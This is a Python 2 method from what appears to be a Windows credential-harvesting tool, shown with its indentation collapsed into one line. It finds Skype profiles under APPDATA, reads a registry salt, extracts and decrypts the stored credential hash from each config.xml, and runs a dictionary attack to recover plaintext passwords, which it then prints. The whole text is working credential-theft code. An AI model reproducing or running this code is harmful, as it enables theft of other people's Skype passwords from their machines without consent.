def run(self): # print title Header().title_info('Skype') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\Skype' if os.path.exists(directory): # retrieve the key used to build the salt key = self.get_regkey() if key == 'failed': print_debug('ERROR', 'The salt has not been retrieved') else: pwdFound = [] for d in os.listdir(directory): if os.path.exists(directory + os.sep + d + os.sep + 'config.xml'): values = {} try: values['username'] = d # get encrypted hash from the config file enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + 'config.xml') if enc_hex == 'failed': print_debug('WARNING', 'No credential stored on the config.xml file.') else: # decrypt the hash to get the md5 to brue force values['hash_md5'] = self.get_md5_hash(enc_hex, key) values['shema to bruteforce'] = values['username'] + '\\nskyper\\n<password>' # Try a dictionary attack on the hash password = self.dictionary_attack(values['username'], values['hash_md5']) if password: values['password'] = password pwdFound.append(values) except Exception,e: print_debug('DEBUG', '{0}'.format(e)) # print the results print_output("Skype", pwdFound) else: print_debug('INFO', 'Skype not installed.')